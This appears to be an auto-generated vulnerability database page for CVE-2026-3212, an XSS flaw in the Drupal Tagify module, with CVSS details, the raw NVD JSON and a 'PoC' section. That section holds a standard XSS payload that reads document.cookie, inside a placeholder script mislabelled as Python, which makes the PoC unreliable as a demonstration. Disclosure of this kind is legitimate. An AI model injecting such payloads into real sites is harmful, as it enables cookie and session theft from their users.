Security Vulnerability Report
中文
CVE-2026-3212 CVSS 5.4 MEDIUM

CVE-2026-3212

Published: 2026-03-25 16:16:22
Last Modified: 2026-03-27 19:21:55

Description

Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Tagify allows Cross-Site Scripting (XSS).This issue affects Tagify: from 0.0.0 before 1.2.49.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:factorial:tagify:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal Tagify < 1.2.49

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC Concept for CVE-2026-3212 --> <!-- Attacker injects script via Tagify input --> <script> // Example payload to be injected into a vulnerable tag field var xssPayload = '<img src=x onerror=alert(document.cookie)>'; // Function to simulate sending the malicious tag function exploit() { console.log('Sending payload: ' + xssPayload); // In a real scenario, this would be sent to the backend endpoint // handling Tagify submissions (e.g., via AJAX POST) } exploit(); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3212", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:22.217", "lastModified": "2026-03-27T19:21:55.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (\"Cross-site Scripting\") vulnerability in Drupal Tagify allows Cross-Site Scripting (XSS).This issue affects Tagify: from 0.0.0 before 1.2.49."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Drupal Tagify permite cross-site scripting (XSS). Este problema afecta a Tagify: desde 0.0.0 anterior a 1.2.49."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:factorial:tagify:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "1.2.49", "matchCriteriaId": "C90572B4-C9F3-49BD-B3C7-2420098CAF3D"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-013", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}